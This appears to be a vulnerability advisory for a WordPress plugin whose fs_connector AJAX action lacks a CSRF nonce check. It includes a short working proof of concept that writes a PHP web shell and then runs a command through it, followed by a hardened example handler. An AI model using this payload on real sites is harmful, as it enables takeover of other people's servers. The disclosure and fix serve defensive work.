Description

The plugin does not properly check the CSRF nonce in the fs_connector AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks using GET requests, such as uploading a web shell.
As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):

await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );

Now a logged-out attacker may access shell.php as follows:

await (await fetch( "/shell.php?cmd=id" ) ).text()
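The root cause described above is an AJAX handler that performs file-system writes without verifying a nonce (and reachable via GET). The following is an added illustrative example of how a WordPress admin-ajax handler for such an action should be written; it is not the affected plugin's code. The nonce action name `fs_connector_nonce`, the handler and script names prefixed `example_`, and the `manage_options` capability are assumptions chosen for this example.

```php
<?php
// Illustrative hardened handler for a hypothetical 'fs_connector' AJAX
// action. This is example code, not the vulnerable plugin's code; names
// prefixed example_ and the nonce action 'fs_connector_nonce' are assumed.

// Register for logged-in users only: no wp_ajax_nopriv_ hook is added,
// so unauthenticated requests never reach the handler.
add_action( 'wp_ajax_fs_connector', 'example_fs_connector_handler' );

function example_fs_connector_handler() {
	// 1. Reject plain GET. A CSRF payload delivered via a link or <img>
	//    can only issue GET requests, so state-changing commands must
	//    require POST. wp_send_json_error() terminates the request.
	if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
		wp_send_json_error( array( 'message' => 'POST required' ), 405 );
	}

	// 2. Verify the CSRF nonce. With the default third argument (true),
	//    check_ajax_referer() ends the request with "-1" when the nonce
	//    in _ajax_nonce / _wpnonce is missing or invalid.
	check_ajax_referer( 'fs_connector_nonce', '_ajax_nonce' );

	// 3. A nonce proves intent, not authorisation: also check that the
	//    caller holds a capability appropriate for file-system changes.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
	}

	// 4. Only now read and sanitise the command; dispatch to the
	//    file-system backend is left as a placeholder.
	$cmd = isset( $_POST['cmd'] ) ? sanitize_key( wp_unslash( $_POST['cmd'] ) ) : '';
	// ... validate $cmd against an allow-list and execute it here ...

	wp_send_json_success( array( 'cmd' => $cmd ) );
}

// The admin page that issues these requests must embed a matching nonce
// so the front-end script can send it as _ajax_nonce in the POST body.
function example_fs_connector_enqueue() {
	wp_enqueue_script(
		'example-fs-connector',
		plugins_url( 'fs-connector.js', __FILE__ ), // assumed script path
		array( 'jquery' ),
		'1.0',
		true
	);
	wp_localize_script( 'example-fs-connector', 'fsConnector', array(
		'ajaxUrl' => admin_url( 'admin-ajax.php' ),
		'nonce'   => wp_create_nonce( 'fs_connector_nonce' ),
	) );
}
add_action( 'admin_enqueue_scripts', 'example_fs_connector_enqueue' );
```

The three checks are independent and all three matter: requiring POST alone does not stop a cross-site form submission, and a valid nonce alone does not stop a low-privilege logged-in user, so the nonce check and the capability check must both be present before any file-system command runs.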
CPE | Name | Operator | Version
---|---|---|---
 | | eq | 1.8